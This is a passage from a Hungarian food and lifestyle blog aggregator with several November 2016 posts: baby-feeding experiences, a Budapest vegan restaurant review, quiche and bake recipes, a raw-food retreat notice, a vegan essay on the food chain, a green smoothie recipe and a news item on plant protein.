csokoládé, bon-bon, marcipán, gyümölcslé, müzliszelet , nápolyi Mindenki szeret nassolni, valami finomságot csipegetni. Ha valami édes meglepetést szeretnél itt válassz egészségesebb változatokat. - Természetes alapú, adalék mentes teák: gyümölcstea, fűszeres tea, zöld tea, gyógytea Készíthetsz saját kézzel szedett tiszta minőségű gyógynövényekből is teakeveréket - Vegyszermentes,bio kozmetikumok: szappan, arckrém, tusfürdő, testápoló, testolaj, hajsampon, smink kozmetikumok Kozmetikumokat is tudsz akár házilag készíteni tiszta minőségű, bio alapanyagokból. Az interneten számos receptet találhatsz. - Könyv: egészséges életmóddal kapcsolatos könyv vagy egészséges recepteket tartalmazó szakácskönyv Készíthetsz kis könyvet Te magad is az általad hasznosnak, inspirálónak gondolt cikkekből, receptekből. - Kikapcsolódás: wellness pihenés, utazás, szauna bérlet, masszázs utalvány, jóga tanfolyam, fitnesz bérlet, uszoda bérlet Sok kreativitást és szeretetet kívánok az ajándék kiválasztáshoz:) szeretettel: Kati
Táplálj helyesen, édesanyám! (6. rész)
2016. november 21. Zizi kalandjai
Kerámia reszelő {Kyocera}, bambusz kanalak {Mamamibolt}
Minden ember más és más. Minden gyerek más és más. Minden baba más és más. Ez itt a Táplálj helyesen, édesanyám! kettő pont nullás újratervezett verziója!
Talán néhányan emlékeztek, hogy miket írtam Ádi hozzátáplálásának a kezdetén. Azóta rájöttem, hogy a leírtak alapján tankönyvszerűen haladtunk. És mi a helyzet Ákossal? Na őt más dióból faragták! Elmesélem miért!
Július elején lett 6 hónapos, de eltelt utána még egy kis idő, amikor először próbálkoztunk nála finom, szaftos, édes őszibarackkal. Nem igazán lett a kedvence, ahogyan a répa sem. Azt gondolom, magával az “ízorgiákkal” volt baja, nem kattant rá a szilárd ételre, ahogyan Ádi, így tartottunk nála egy kis szünetet. Azért persze néha-néha próbálkoztunk újra őszibarackkal, almával és répával, de csak próbaszerűen. 8 hónapos kora körül kezdett el kicsit jobban érdeklődni az ételek iránt, de nem olyan lelkesedéssel, mint Ádi, hanem ímmel-ámmal, néha ízlett neki egy-két dolog és egész jól evett belőle.
Az az igazság, hogy másodjára már nem vagyok annyira lelkes a hozzátáplálást illetően, mint első alkalommal. Két gyerek ellátása és a háztartás vezetése mellett, valamint a saját ebédünk megfőzése mellett kevés időm marad Ákos ételeinek elkészítésére. Igyekszem minél könnyebben és egyszerűbben megoldani a dolgot, ráadásul sokszor fektetek bele több energiát, hogy hátha most majd megeszi, amit főzök, aztán mégse teszi. Szóval lazábban kezelem a dolgot és többnyire nyers vagy sült zöldségeket és gyümölcsöket adunk neki. A nyers gyümölcsök többségét – körtét, almát – Kyocera kerámia reszelővel reszeljük pépesre. Hihetetlen könnyű reszelni ezzel a 100% kerámia reszelővel, ugyanis szilikon aljzattal rendelkezik, mely meggátolja az eszköz használat közbeni elcsúszását. Simán tartod az egyik karodban a gyereket, a másik kezeddel pedig tudod reszelni a hámozott almát, ráadásul villámgyorsan, mert a kerámia anyagnak köszönhetően nagyon gyorsan le lehet reszelni vele egy teljes almát vagy körtét. Nem csak baba hozzátápláláshoz hasznos az eszköz, mert lehet vele reszelni fokhagymát, gyömbért, kurkumát, őszibarackot, puhább zöldségeket, például cukkinit is (kiváló ajándék lehet karácsonyra a szuper éles hámozóval együtt – anyukám szerint a világ legjobb hámozója, ő már elég sok fajtát kipróbált, de szerinte ez a legjobb ).
Lazábban veszem azt is, hogy miket adok neki, szóval ő sokkal hamarabb kóstolta az avokádót és a banánt például, mint Ádi. Mennyiségeket egyáltalán nem mérek nála, teljesen felesleges, mert randomszerűen eszik. Hol egy egész kis tálkával megeszik például egy almás kását, hol egy kanálnyi után nemtetszését fejezi ki, tehát értelmetlen lenne mennyiségeket mérni és azokat tukmálni rá. Zöldségeken és gyümölcsökön kívül gluténmentes gabonakását csinálunk még neki kb. 8-9 hónapos korától. Ezt is néha megeszi, néha nem. Gluténmentes tésztát is eszik, a Biorganiktól veszem ezt a kis kagyló formájút, ami azért jó, mert a pici kis ujjaival könnyen tudja csipegetni a tészta darabkákat.
Brokkolis tészta (főtt gluténmentes tészta párolt brokkolival)
Abban is lazább vagyok, hogy sokkal hamarabb adtam neki darabos, darabkás ételeket. Pürével kezdtünk, de néha úgy éreztem, hogy a darabos étel jobban menne neki. Nem mondom, hogy BLW-zünk – és tudom BLW (baby led weaning) során tilos keverni a pürés ételeket a darabossal -, inkább azt mondom, hogy hamarabb kezdte a darabos ételek fogyasztását, mint Ádi. Most már 10.5 hónapos, van már 5 foga és még legalább 5-6 jön neki éppen, tehát egész jól tud már “rágcsálni”. Valószínűleg a sok fog érkezése miatt viszont most alig eszik valamit, hébe-hóba kóstolgat meg ételeket… bármit teszek elé, adok neki, többnyire nem érdekli. A cici viszont annál inkább. Ez a fogzási időszak velejárója lehet, hogy nincs a babának étvágya. Na de Ákos súlya miatt nem kell aggódni, mert már 9.5 hónapos korában 11 kg volt!
Ádinak nem jöttek rohamtempóban a fogai, észre sem vettük, hogy fogzik, tehát nála étvágytalanság fel sem merült. Ákosnál viszont éppen turbó időszak van, így szegénykém nyugtalan is, meg a szilárd étel sem érdekli igazán.
Szóval ezeket ette, próbálta eddig (10.5 hónapos éppen):
Gyümölcsök: őszibarack, sárgabarack, alma, körte, szőlő, mangó, banán, avokádó.
Zöldségek: cukkini, kaliforniai paprika, répa, paszternák, sütőtök, spenót, brokkoli, karfiol, édesburgonya, lilaburgonya, burgonya, uborka, fokhagyma.
Gabona: gluténmentes gabonapehely, gluténmentes tészta.
Zsiradék: hidegen sajtolt babaolaj (repce-, napraforgó-, kenderolaj), minimális kókuszzsír.
Folyadék: anyatej, víz.
Zöldfűszer: kakukkfű, petrezselyem.
A tuti nyerő étel nála az avokádó. Általában ezt mindig megeszi. Vagy csak simán a héjából kikanalazzuk a gyümölcs húsát és falatkákat adunk, vagy villával pépesre törjük és úgy adjuk neki. Általában képes megenni egy fél avokádót vagy egy kicsivel többet egy étkezés során. Egyszer főztem fokhagymás párolt spenótot, amit gabonakásával kevertem össze. Meglepő módon az egészet megette. Teljesen kiszámíthatatlan, hogy mit eszik meg és mikor. Reménykedünk, hogy a fogai minél előbb kibújnak, a fájdalom elmúlik és megjön az állandó étvágya minél előbb.
Táplálj helyesen, édesanyám! (1. rész)
Táplálj helyesen, édesanyám! (2. rész)
Táplálj helyesen, édesanyám! (3. rész)
Táplálj helyesen, édesanyám! (4. rész)
Táplálj helyesen, édesanyám! (5. rész)
A YoGastro-ban jártam, Budapest legolcsóbb vegánbarát éttermében
2016. november 19. Vegán lettem
A YoGastro a Kálvin tér közvetlen közelében működő, indiai témájú nagyon olcsó, de nem olcsósított kellemes hangulatú étterem.
A YoGastro megközelítése:
Első alkalommal sikerült elmennem a hely előtt. Történhetett ez azért is mert elmélázva, kiszállva a testemből már azon járt az agyam, hogy milyen lesz a dhal és a szabdzsi amit választok ... és történhetett azért is, mert a hely tulaja nem nagyon szeretné az utca népének elmondani, hogy az Üllői út 6-os szám alatt, a Kálvin tértől 2 percre gyalog van egy kis vegetáriánus, vegán étterem. Amikor keresitek a helyet, legyetek figyelmesek és keressétek a YoGastro logót, mert szemmagasságban nincs eléggé felcímkézve a bolt. Egyébként az étterem a jóga közösségeket régóta megmozgató Atma Centerben található és 2015-ben kapta azt a nevet, amivel ma is fut.
YoGastro választéka:
Kifejezetten nagy választékkal találkoztam az étteremben. Levesek, dhalok, szabdzsik, tésztaételek, pizza, tortilla, hamburger, egytálételek, chutney-k, saláták, nyers sütik, juice-ok és sorolhatnám. Az ételek közel 90%-a teljesen vegán, egy-két étel volt csak, mely tartalmazott tejterméket, de erről szívélyesen informálnak az ott dolgozók. Az árak nem hogy nem elszálltak, hanem szinte egyedülállóan barátiak. Szerintem a legolcsóbb vegánbarát hely Budapesten. Desszert nélkül egy levesért és egy főételért fizettem 990 Ft-ot. A sütit azért nem vettem bele, mert főleg nyers vegán sütik voltak amikor mentem és azok bizony sehol nem olcsók. Egyébként egy normális méretű szelet torta 650 Ft YoGastro-ban. Csokoládés ananászos, datolyával édesítve. Gondolhatjátok. Álom. Emellett volt chia és tápióka poharas puding, valamint kölesgolyó málna chutney-val. A Tortafészek nyers vegán tortakészítő műhely központja egyébként a YoGastro, úgyhogy garantált minden nap a friss és finom édesség.
A fizetés után volt egy kis félelmem a minőséget illetően, hisz ami olcsó az lehet, hogy olyan is. Ez esetben erről szó sem volt, sőt egy kifejezetten finom, nem tolakodó ízvilágú indiai vegán menüt kaptam a pénzemért. Ha olcsón, gyorsan és finomat szeretnék enni a város ezen terültén, én biztos, hogy ide jövök legközelebb is.
YoGastro-tól tudsz rendelni is:
Nemrég indították klasszik heti menürendelős szolgáltatásukat. Rendelhetsz előre 1 hónappal, 1 héttel, vagy akár 1 nappal levest, dhalt, kétféle főételből, kétféle köretből, főzelékből, salátából, egytálételből és desszertből választva, legkésőbb 24 órával a kért kiszállítás előtt. A kiszállításra munkanapokon reggel 8:00-tól 11:30-ig számíthatsz. A kis menü 1100Ft-ért, míg a nagy menü 1490 Ft-ért rendelhető. Szerintem ez is elfogadható ár. Kipróbálom még ezt a szolgáltatásukat is és majd kiegészítem a cikket.
Nyitvatartás:
Hétfőtől péntekig: 11:00 és 20:00 óra között,
szombaton: 11:00 és 18:00 óra között.
Cím: 1085 Budapest, Üllői út 6.
A YoGastro vegetáriánus/vegán étterem weboldala és facebook oldala.
Mangeons comme les francais!
Hosszú téli estéken gyakran előkerülnek a polcról kedvenc gasztro regények. Felütve őket éppen ahol nyílik pár másodperc olvasás után hősnőnk, Suzan Loomis konyhájában találom magam, elragad a sütőből felszálló kakukkfű aromás illata: ...Este van, a kandallóban tűz ropog. Suzan éppen quiche-t, francia sós lepényt süt. Louviers piacának kofáinál járt a nyirkos reggeli órákban, ahol egészségtől kicsattanó tojásokra tett szert és mellé pár szem illatos körte is került túlméretezett fonott kosarába. Egy valamire való francia konyhában sajt, vaj mindig van otthon, Suzan pedig amerikai születése ellenére bolondul a vidéki francia konyháért... Félredobom a könyvet, szaladok a konyhámba, feltépem a hűtő ajtaját és örömmel látom, ugyan sok minden nincs benne, de egy jó darab vaj + egy érintetlen csomagolású camembert éppen kerekedik a polcon. Körte is van, minő véletlen, kakukkfű pedig télen is zöldül a kertben. Mennyi hasonlóság, csak nem Zsuzsanna a keresztnevem, vagy mégis? Jólesik néha ábrándozni egy kicsit! Az omlós tésztához ( kb. 20 cm átmérőjű piteformába ): ? 200 g liszt ( 100 g kukoricaliszt és 100 g fehér tönkölyliszt ) ? 100 g hideg felkockázott vaj ? 1 tojás sárgája ? 4-5 ek. jéghideg víz ? 1 tk. só Camembert sajtos-körtés töltelék: ? 1 ek. olívaolaj ? 10 cm es darab póréhagyma ? kisebb csokor snidling ? 200 ml tejszín ? 100 ml krémsajt ? 3 tojás ? 100 g camembert sajt ? 2 körte vékony szeletekre vágva ? 1 marék durvára vágott dió ? 1 friss ág kakukkfű ? só, frissen őrölt bors Az omlós tésztát összegyúrjuk, a lisztbe beledobjuk a feldarabolt hideg vajat és gyors mozdulatokkal kézzel, vagy robotgéppel addig morzsoljuk, míg teljesen morzsalékos állagú nem lesz. Hozzáadjuk a tojást, a sót és addig gyúrjuk tovább, amíg összeáll. Egy belisztezett nyújtódeszkán kb. 3 mm vastagságúra nyújtjuk, kivágunk a piteformánkba illeszkedő kör alakot és vakon elősütjük 175 fokon 25 percig. ( Vakon sütés azt jelenti, hogy sütőpapírt teszünk a tészta fölé is és feltöltjük lencsével, babbal, vagy sütő gyönggyel, megakadályozva ezzel a tészta felpúposodását. ) A töltelék összeállítása: megpároljuk az apróra vágott póréhagymát a zsiradékon, majd egy tálba összekeverjük a tejszínnel, a krémsajttal és a tojásokkal. Sózzuk, borsozzuk és hozzáadjuk a kis kockákra vágott camembert sajtot és az apróra vágott snidlinget majd alaposan összeforgatjuk. A körtét vékony szeletekre, a diót pedig éles késsel durvára vágjuk. A pitébe öntjük a tejszines-camembertes keveréket és a tetejét kirakjuk körte szeletekkel, megszórjuk dióval és morzsolunk rá friss kakukkfű levélkéket, majd 200 fokos sütőben, alsó-felső sütéssel kb. 20 perc alatt készre sütjük. A tésztát tölthetjük bármilyen más töltelékkel, az édes íz irányába is szárnyalhat fantáziánk. Ekkor érdemes a tészta begyúrásakor 1-2 ek. cukorral már az alap tészta ízét is ráhangolni az édeskés töltelékre. A narancsos-almás-sütőtökös hármas izgalmas őszi-téli ízvilág, amit a dió éppen úgy koronáz, mint a camembertes sós variációnál. Ezt a pite változatot készíthetjük úgy, hogy a tésztának egyharmad részét félretesszük és miután a töltelék hozzávalóit előpároltuk, összekevertük a tojásos masszával, majd betöltöttük az elősütött tésztába, a maradék tésztát kisodorjuk és 1 cm széles csíkokat vágunk belőle és a pite tetejét berácsozzuk. Megkenjük felvert tojással a rácsokat és indulhat a végső sütés fázisa. Narancsos-sütőtökös-almás töltelék: ? 1 ek. vaj ? 1 nagy alma 1 cm-es oldalhosszúságú kockákra vágva ? kisebb sütőtök negyede 1 cm-es oldalhosszúságú kockákra vágva ? 1 narancs reszelt héja és frissen préselt leve ? 200 ml tejszín ? 100 ml krémsajt ? 3 tojás ? 1-2 ek barna nádcukor vagy méz ? csipet só, fahéj, őrölt kardamom, őrölt gyömbér
Padlizsános-lecsós rakott krumpli
2016. november 13. Éltető ételek
Ez egy nagyon egyszerű és olcsó recept. Főleg nyáron, amikor szezonja van a parikának és a paradicsomnak. Én szoktam télire készíteni lecsót üvegbe, így könnyen hozzáférhető alapanyagom van ilyenkor is. Hozzávalók (2-3 főre) - 1 liter lecsó (paprika, paradicsom, hagyma, fokhagyma) - 1 padlizsán - 2 kg burgonya - só, bors, bazsalikom, rozmaring, kakukkfű Elkészítése: A lecsót jó hagymásan, fokhagymásan készítsük el. A padlizsánt pácoljuk be reszelt fokhagymával, sóval, borssal, pirospaprikával és pici olajjal. Hagyjuk állni úgy 15 percig. Majd ezt a pácolt padlizsánt pár perc alatt süssük össze a lecsóval. A krumplit hámozzuk meg, és szeleteljük fel. A lecsót öntsük bele a tepsibe, mely kb. 1 cm vastagon legyen az alján. Erre szépen állítsuk rá a krumplit, picit fedésbe egymással. Ez azért jó így, mert a krumpli teteje ropogós lesz, viszont alulról felszívja a lecsó zaftját. A tetejét szórjuk meg sóval és a fűszerekkel. Előmelegített sütőben 180-200 fokon süssük kb. 40-50 percig.
Kismamák, figyelem! Szeretnétek időt nyerni a mindennapokban?
2016. november 11. Éltető ételek
Elmesélem, ma mit főztem a két pici mellett. Akik, megjegyzem, nagyon picik. Vagyis éppen annyira, hogy zavart teremtsenek bármilyen erőben, hogy egyszerre ketten négyfelé rohanjanak, hogy lerántsanak mindent az asztalról, konyhapultról, hogy kiborítsanak bármit...és sorolhatnám, mikre képes egy 2 és egy 1 éves ördögfióka. De ti mind úgyis tudjátok. Szóval: reggel gyorsan összedobtam nekik egy kis zabkását kókusztejből. Természetesen A GÉPpel. 1 perc volt. Aztán tízóraira készítettem egy kis gyümölcspürét, szintén legújabb barátommal, hivatalos nevén MAG4-el, de mi csak A GÉPnek hívjuk. A gyümölcspucolás kicsit macerás volt, de utána semmi dolgom nem volt vele, csak egy gombot kellett benyomni és ő csinálta a dolgát. Aztán délelőtt még kétszer használtam: elkészítettem a levest vele és utána elővettem egy adag lefagyasztott barackot, s ,,összeütöttem egy kis dzsemet, mert sajnos már minden tartalék elfogyott. Hogy ennek milyen finom illata tud lenni! Mindig elcsodálkozom. Persze amikor végzett beledobtam mindent a leveshez, hadd szóljon. Épp időben lett kész. Aztán a bébiétel is elkészült, amíg a levest majszolták. Miután a gyerekek felkeltek, bekészítettem még egy adag mandulatejet, mert megint elfogyott a tegnapi két liter. Aztán irány a játszótér. Este már csak egy kis mártogatóst készítettem, lilahagyma chutney néven találtam a receptek közt. Édeskrumplival, sült répával zseniális! Aztán másnapra elkészítettem a szezámmagos mártogatóst, előre. Este, az utolsó mosogatásnál megjegyeztem a férjemnek: azért ha még mosogatni sem kellene, akkor lenne az igazi....Mire ő megkérdezte: mit csináltatok ma? Mondtam, hogy gyurmáztunk és ujjfestékkel is maszatoltunk a csomagolópapírokon, amit a múltkor hozott. És mostam, meg teregettem. És gyakoroltuk a fürdetést és a bilizést a babákkal. Na meg kiolvastuk a Négyszögletű kerek erdőt. Ja, és persze háromszor öltöztünk át, mert egyedül akarnak csak inni. De még hideg van ahhoz, hogy vizes ruhákban flangáljanak. Erre ő megjegyezte: Ne mondd, hogy A GÉP 4 óra szabadidőt zúdított rád?! Az biztos, hogy sokat segít - tűnődtem - de azért csak szervezés kérdése, nem igaz? ;) Ha akarsz egy jó barátot: http://magtej.hu/ valamint www.facebook.com/magtej.hu
Adventi nyersétel hétvége Lénárt Gittával és Nyári Lászlóval
2016. november 9. Gitta nyersétel blogja
Egy csodás hétvégi programra szeretnélek invitálni benneteket :) Helyszín, időpont: 2016 december 02. - december 04.ig. Piliscsaba, István király út 147. (Cosmos ökopanzió) Szeretettel hívunk egy feltöltő, adventi hétvégére, a Pilisbe. Tarts velünk és készüljünk együtt az ünnepekre. Ezen a hétvégén lehetőségünk lesz megismerkedni a nyers ételek ünnepi változataival, visszanézhetünk és tudatosan összegezhetjük, a 2016-os évet. Együtt készíthetünk ajándékokat barátainknak, szeretteinknek. Célunk a tudatos táplálkozás népszerűsítése mellett, hogy együtt élhessük át veletek az Advent és a Karácsony hangulatát. Az egészséges, nyers ételekről Lénárt Gitta és csapata gondoskodik, az önismereti folyamatokat, Nyári László segíti. Az ételek alapanyagai kizárólag zöldségek, gyümölcsök, magok, csírák. A program: Péntek: 14.oo - 16.3o Érkezés, elhelyezkedés, regisztráció 16.3o - 17.00 Tábor nyitás, fontos tudnivalók 17.oo - 19.00 Nyers vacsora készítése és elfogyasztása. 19.oo - 19.30 Beszélgetés Szakács Viktória dietetikussal a nyers étkezés alapjairól 2o.oo - 22.00 Nyitó kör, ismerkedős beszélgetés. Szombat: 06.00 - 07.00 Reggeli meditáció (fakultatív) 08.0o - 10.00 Ünnepi nyers reggeli közös elkészítése és elfogyasztása. 1o.0o - 12.0o Kreatív, Karácsonyi díszek és ajándékok készítése Erzsivel. 12.oo - 14.00 Ünnepi nyers ebéd közös elkészítése és elfogyasztása. 14.3o - 16.3o Tudatos év összegzés Lacival. 17.oo - 19.00 Ünnepi nyers vacsora elkészítése és elfogyasztása. 20.00 - 22.oo Esti közös program, ajándékozás. Vasárnap: 06.00 - 07.00 Reggeli meditáció (fakultatív) 08.0o - 10.00 Nyers reggeli készítése és elfogyasztása. 1o.oo - 12.00 Záró, közösségi program. 12.00 - 14.00 Nyers ebéd készítése és elfogyasztása. 14.oo - 15.oo Búcsúzkodás, hazaindulás. A program gyönyörű környezetben, friss levegőn, jó társaságban, finom ételekkel kerül megrendezésre... A helyszínen meg lehet vásárolni Lénárt Gitta könyveit, valamint a Nyersétel Akadémia aszalványait, ropogtatnivalóit. Részvételi díj: 34.900 Ft/fő, mely tartalmazza 2 éjszaka szállást 2-5 ágyas szobákban, napi 3x nyers étkezést, és a közös programokat. A hétvége alatt igénybe lehet venni Király Ákos masszázsát. Jelentkezés: gitta@nyersetelakademia.hu vagy onismeret@nyarilaszlo.hu címen! Mindenkinek kellemes és hasznos időtöltést kíván Lénárt Gitta és Nyári László
Az élet rövid, a desszertet kéne először meg enni...
2016. november 9. Eszemiszom – Jóga Magazin
Azt már többször is áttárgyaltuk, hogy hanem is Ájurvédikusan, de az őseink azért a természet törvényeit követve eléggé jól beállítottak étkezési rendszereket.
És ezek a jól bevált rendszerek az egész világban jól működtek mindaddig, ameddig az emberek követték a természet rendjét. Kb. így alakult ki az a desszert kultúra is, hogy az édességet az étkezések végn fogyasztjuk el.
Ájurvédikusan ezt úgy magyarázzuk, hogy:
- egy részről az édesség nyugtatja a gyomornyálkahártyát, hiszen a legtöbb édesség alapanyag nyákosít, így ha valami túl csípőset, vagy savast ettünk volna, akkor a gyomrunk kicsit ki is engesztelődik.
- másodsorban az édes íz erjeszt is, lásd a joghurtot is úgy oltjuk, hogy a tejbe nemcsak joghurt kultúrát rakunk, hanem egy kevés cukrot is.
- harmadjára pedig azért is fontos az édesség, mert a cukor szinte azonnal felszívódó energiát biztosít a szervetünknek, ami nagyon kemény munkának van kitéve az emésztés folyamán.
TÁÁÁ DÁÁÁÁ! Na ezért fontos a desszert.
De, hogy a cikk címének is eleget tegyek, azért van olyan hely Indiában ahol az édességet előre fogyasztják. Gudzsarat államban pl. srikant-tal szokták kezdeni az étkezéseket, ami egy sűrű joghurtos édesség. Ez a joghurt miatt fontos Ájurvédikusan, hiszen a joghurt beindítja a gyomornedvek termelődést és segíti az erjedést is.
Itthon is könnyű jó sirkantot csinálni. Majd írok receptet is!!!
Om Tat Sat
Baktai Ádám Védikus pap, a Védikus tudományok szakértője
Az ember, mint a tápláléklánc csúcsa
2016. november 3. Vegán lettem
Nem azért küzdöttük fel magunkat a tápláléklánc csúcsára, hogy vegetáriánusok legyünk. - szól a közhely.
Ezer és egy beszélgetésen vagyok túl, mely a növényi étrendet és főleg a veganizmust méltatta, a fenti érvet pedig többször több kontextusban is volt szerencsém hallani, olvasni. Ebben a formában ezt a kijelentést több szempontból is félrevezető érvelésnek tartom, mert úgy téríti el vagy próbálja meg lezárni a beszélgetést, hogy egyrészről túlságosan beszűkülten közelíti meg az emberi lényt, másrészről az állítás hamis. Ez utóbbi két állításomat fejtem ki ebben a bejegyzésben.
Miért hamis az állítás, miszerint az ember a tápláléklánc csúcsa?
Arról, hogy az állítás hamis nem szeretek hosszan beszélgetni, mivel elvonja a figyelmet az érvben fellelhető sokkal fontosabb beszűkült látásmódról. Na de ott tartottunk, hogy az ember a tápláléklánc csúcsa. Ez az etológusok szerint nem igaz. Tudományos szempontok alapján valahol a disznókkal és a szardellákkal állunk egy szinten. Vicces nem? Az amerikai tudományos akadémia hasábjain (PNAS) jelent meg 2013-ban egy tanulmány, melyben 176 ország 48 évet felölelő táplálkozásai adatait felhasználva állapították meg az ember trofikus szintjét, amely alapján meghatározták, hol állunk a táplálékláncban. A trofikus szint jelentéséről, magáról a kutatásról és a teljes tanulmányról a PNAS oldalán olvashatsz, amelynek linkjét a cikk alján találhatod.
Miért beszűkült az állítás, miszerint az ember a tápláléklánc csúcsa?
Beszűkült, mert az emberből csak annyit vesz figyelembe, hogy ott és annyit kaszabol ahol és amennyit enged magának, azokat a tulajdonságokat figyelembe nem véve, ami ezt lehetővé tette és teszi. Azok az élőlények helyezkednek el a tápláléklánc csúcsán, amelyeknek már nincsen természetes ellenségük. Ilyen az oroszlán és a fehér cápa is, de mindegyik csúcsragadozó csak a saját környezetében képes uralni a táplálékláncot. A cápa tehetetlen lenne a szavannán, míg az oroszlán tehetetlen lenne a tengerben. De mi van az emberrel? Nem igaz, hogy mi vagyunk a tápláléklánc csúcsa mert természetes környezetében mindegyik csúcsragadozó könnyedén elbánna velünk és mégsincs természetes ellenségünk semmilyen életterületen. Miből adódik ez a paradoxon?
Egy másik kérdéssel közelítem meg az előző kérdéseket: Mi a különbség az ember és a többi állat között?
Nagyon sok különbség van ugyan, de ami most az én szempontomból és a cikk szempontjából fontos, azt más elvonatkoztató gondolkodásnak nevezi, én tudatos gondolkodásnak. Ezen a ponton könnyen elferdülhet a dolog, ha valaki azt gondolja, hogy az állatok nem gondolkodnak. Mert ez nem igaz. Az viszont igaz, hogy az ösztön, a hajlam és az érzeti szintek pillanatnyi megélésén túlmutató önálló gondolkodásra képes az ember. Az állatok is képesek a gondolkodásra de az kevés esetben a pillanatnyi megélésen túlmutató gondolkodás, nem a humán értelemben vett énségből vagy egóból fakad, és legtöbbször a faj természetéhez igazodik.
Az, hogy az ember az elvonatkoztató vagy tudatos gondolkodásra képes, vezette többek között oda, hogy eszközöket gyártson, hogy használni kezdje a tüzet, hogy a mai értelembe vett szociális környezetet kialakítsa, hogy írni és olvasni tudjon, hogy autóba üljön, hogy számítógépeket alkosson, hogy annyi csodálatos tudományos felfedezést tegyen, hogy leigázzon és megsemmisítsen kultúrákat, hogy saját fajtársait valamint egyéb állatfajtákat rabszolgaságba (semmilyen más állatfaj nem tesz ilyet) és gázkamrába vagy mészárszékre hajtson. Képesek vagyunk előrelátóan gondolkodni, a jelenlegi abszolút helyzetünkből kilépve értékelni és döntést hozni. Ezzel a gondolattal értem el cikkem lényegéhez.
Az én olvasatomban az az alapvetően hibás és beszűkült kijelentés, miszerint az ember a tápláléklánc csúcsa azt kellene jelentse azon a fejlettségi szinten, ahol az emberi faj a 21. században áll, hogy képességünk van tudatos döntést hozni élet és halál felett (jelen esetben húst enni és tejet inni vagy a növényi étrendet választani, bőrcipőt hordani vagy egyéb anyagból készül lábbelit választani, stb.), és képességünk van tudatos gondolkodással megóvni, valamint adott esetben védelmezni azon egyéb állatfajokat, amelyek lényegében kiszolgáltatottan élnek az emberek mellett. Legyen szó tengerről, szárazföldről vagy levegőről az ember nagyon sok esetben pusztításra használja tudását és képességeit. Lehetne ez másképpen is, lehetnénk mi a tápláléklánc csúcsa intelligenciánkhoz méltóan, a lehető legkevesebb szenvedést okozva. Hisz hatalmában vagyunk olyan döntést hozni, mely adott esetben egy másik állatfaj tagjának az életet jelenti.
Ez nem azt jelenti, hogy holnaptól legyen mindenki vegán. Ez csak annyit jelentsen a többségnek, hogy legyetek nyitottak, legyetek érdeklődőek, merjetek kételkedni a napi rutinotokban és a 30-40 év alatt belénk égett igazságokban, olvassatok sokat, informálódjatok és ne csak a számotokra kedves forrásokból, valamint ne gondoljátok azt, hogy úgysem számít mit csináltok, hisz mindannyian egyéni szinten hozzuk meg a döntéseinket életről vagy halálról. Arról nem is beszélve, hogy a mai döntésed annak az állatnak nagyon nem mindegy, akit fél év múlva küldenek majd a vágóhídra, a kísérleti laborba, vagy nyúzzák meg puha szőréért.
Források:
http://www.pnas.org/content/110/51/20617.full (a cikkben említett tanulmány teljes anyaga)
http://www.smithsonianmag.com/science-nature
Rudolf Steiner: A világ és az ember szellemi megismerésének alapelemei
http://mek.oszk.hu/08900/08974/08974.pdf
Zöld turmix spenóttal és banánnal
Ha a zöld turmixok világával ismerkedsz és elsőre valami finomabbat innál, a következő zöld turmixot ajánlom banánnal és spenóttal. Miért érdemes beépíteni a zöld turmixokat legalább alkalmanként az étrendünkbe? Válaszoljanak az idézett részletek Victoria Boutenko: A nyers étel csodája című könyvből (II. rész: Életet adó zöldek).
,,Eleinte csupán színesíteni szerettem volna a zöld levelekkel a megszokott, élő táplálékokból álló étrendünket. Meglepetésemre azonban azt tapasztaltuk, hogy még viszonylag kevés zöld levelű fogyasztása is döbbenetes mértékű egészségjavulást eredményezett. Ráadásul összehasonlíthatatlanul könnyebb eleinte csak leturmixolni ezeket, mint kapásból átállni a teljesen nyers étrendre. (139.old.)
,,Egy hónappal azt követően, hogy beiktattam étrendembe a zöld turmixokat, két, gyermekkorom óta meglévő szemölcsöm eltűnt a testemről, és energikusabbnak éreztem magam, mint valaha. Továbbá: ... A körmeim erősebbek lettek, ... és kifejezetten kellemes lett a szám íze, még reggel, ébredéskor is, amit pedig utoljára csak igen fiatal koromban tapasztaltam. (166.old.)
,,A zöld turmixok ivásának megkezdésével megszűntek az éhségrohamaim. (168.old.)
,,Sokan élvezik a napfényt. Mindannyian jobban érezzük magunkat, és egészségesebbnek nézünk ki, ha valamennyi időt rendszeresen a napon tartózkodunk. Igyekszünk ilyenkor annyi napfényt magunkba szívni, amennyit csak lehet. Ám kevesen tudnak a napfény folyékony formájáról, a klorofillról. (232.old.)
,,A klorofill ugyanolyan fontos, mint a napfény. Nem létezne élet napfény nélkül, és nem létezne élet klorofill nélkül. A klorofill lényegében folyékony napenergia. A sok klorofill fogyasztása olyan, mintha szerveinket napfényben fürdetnénk meg. A klorofillmolekula nagyon hasonló az emberi vérben levő hemoglobin hem-molekulájához. (232.old.)
,,A klorofill úgy vigyáz a testünkre, ahogy egy gondoskodó és szerető anya teszi. Valamennyi szervünket pucolja és gyógyítja, sőt el is tudja pusztítani a legtöbb kórokozó baktériumot és gombát, valamint a daganatsejteket, és még számos egyéb pozitív hatása is van. (232.old.)
A recept
Hozzávalók:
- 10-15 dkg spenótlevél
- 1-2 banán
- 1,5 dl víz
Elkészítés:
A spenótleveleket megmossuk, a nagyobb leveleket beletépkedjük a turmixgépbe, a kisebbeket egészbe tesszük bele. A banánokat rákarikázzuk. Felöntjük kb. 1,5 dl langyos vízzel. Összeturmixoljuk. Pohárba töltjük és elfogyasztjuk. Akár munkába menet is elkortyolgathatjuk, megfelelő "edénybe" töltve.
A Tescot és más cégeket arra kértek, hogy váltsanak növényi fehérjére
A Tescot és más cégeket arra kértek, hogy ne áruljanak olyan sok húst, helyette váltsanak növényi alapú fehérjeforrásokra. A 40 befektetőből álló csoport, aminek vagyona eléri az 1.25 trillió dollárt, kampányba kezdett, amelyben igyekszik felbátorítani 16 globális áruházláncot, hogy termékeikben változtassanak a fehérjeforráson a környezeti és egészségügyi kockázatok csökkentéséért. A befektetők, akik között megtalálható az Aviva biztosító és számos svéd állami nyugdíjalap, szeptember 23 -án levelet írtak az élelmiszercégeknek, amiben arra sürgetik őket, hogy reagáljanak arra az “anyagi” kockázatra, amit az ipari állattartás okoz, és váltsanak növényi alapú fehérjeforrásokra. A megcélzott cégek, többek között a Tesco, a Kraft Heinz, a Nestlé, az Unilever, a Walmart, egy nyilatkozatot kaptak a Farm Animal Investment Risk & Return Initiative-től, amit a fentebb említett csoportosulás hozott létre. “A világ túlzott bizalma az élelmiszeripar által előállított állatállományban, amivel kiszolgálják a növekvő, globális fehérjeigényt, a receptje egy anyagi, társadalmi és környezeti krízisnek” – állítja Jeremy Coller, a FAIRR kezdeményezés alapítója és első számú befektetője egy egyenlőségre 